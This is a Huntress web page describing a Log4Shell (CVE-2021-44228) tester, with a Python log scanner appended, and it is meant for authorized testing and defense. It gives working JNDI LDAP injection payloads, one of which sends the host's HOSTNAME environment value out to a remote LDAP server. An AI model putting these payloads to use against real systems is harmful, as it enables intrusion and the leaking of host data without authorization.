Huntress Log4Shell Vulnerability Tester

Our team is continuing to investigate CVE-2021-44228, a critical vulnerability in log4j, a Java logging package that is used in a significant amount of software. The source code for this tool is available on GitHub at huntresslabs/log4shell-tester.

This site can help you test whether your applications are vulnerable to Log4Shell (CVE-2021-44228). Here's how to use it:

Please know that a negative test does not guarantee that your application is patched. The tool is designed to offer a simpler means of testing and is intended for testing purposes only—it should only be used on systems you are authorized to test. If you find any vulnerabilities, please follow responsible disclosure guidelines.

Your unique identifier is: c3076a0d-f0cc-4e63-a687-c5e46906ecc4. You can use the payload below for testing:

${jndi:ldap://log4shell.huntress.com:1389/c3076a0d-f0cc-4e63-a687-c5e46906ecc4}

If you need other values, you can use the extra keys mechanism. This works by adding path components to the LDAP path in the above payload. Any values separated by / in the LDAP path will be included in the extra keys column on the results page. The only requirement is that your UUID is the last item in the list. For example, the following returns the hostname in the extra keys:

${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/c3076a0d-f0cc-4e63-a687-c5e46906ecc4}

Technical Details

The tool works by generating a random unique identifier which you can use when testing input fields. If an input field or application is vulnerable, it will reach out to this website over LDAP. Our LDAP server will immediately terminate the connection, and log it for a short time. This tool will not actually run any code on your systems.
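
The extra keys rule described above (path components separated by /, with the UUID last) can be checked against your own application logs to see which test payloads were submitted and what they would report. The following is an added example, not code from the Huntress tool; the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
import uuid

# Start of an LDAP JNDI lookup. The body is read by counting braces because
# the path may hold nested lookups such as ${env:HOSTNAME}.
JNDI_START = re.compile(r"\$\{jndi:ldap://", re.IGNORECASE)

def find_jndi_ldap_lookups(line):
    """Return the 'host:port/path' part of each ${jndi:ldap://...} in line."""
    found = []
    for m in JNDI_START.finditer(line):
        depth, i = 1, m.end()
        while i < len(line) and depth:
            if line.startswith("${", i):
                depth, i = depth + 1, i + 2
                continue
            if line[i] == "}":
                depth -= 1
            i += 1
        if depth == 0:  # skip truncated lookups with no closing brace
            found.append(line[m.end():i - 1])
    return found

def split_extra_keys(target):
    """Split 'host:port/extra/.../uuid' into (host, extra_keys, uuid)."""
    host, _, path = target.partition("/")
    parts = [p for p in path.split("/") if p]
    if not parts:
        raise ValueError("LDAP path carries no identifier")
    ident = str(uuid.UUID(parts[-1]))  # ValueError if the last item is no UUID
    return host, parts[:-1], ident

def scan(lines):
    """Yield (line_no, host, extra_keys, uuid) for each well-formed test payload."""
    for no, line in enumerate(lines, 1):
        for target in find_jndi_ldap_lookups(line):
            try:
                yield (no, *split_extra_keys(target))
            except ValueError:
                continue  # UUID missing or not last: not a usable test payload

# Constructed application log lines (not real data); the UUID is the page's.
UID = "c3076a0d-f0cc-4e63-a687-c5e46906ecc4"
SAMPLE = [
    'INFO search q="${jndi:ldap://log4shell.huntress.com:1389/%s}"' % UID,
    'INFO search q="${jndi:ldap://log4shell.huntress.com:1389/hostname=${env:HOSTNAME}/%s}"' % UID,
    'INFO search q="${jndi:ldap://log4shell.huntress.com:1389/%s/hostname=x}"' % UID,
    'INFO search q="shoes"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The third sample line is skipped because its UUID is not the last path component, which is the one requirement the extra keys mechanism imposes.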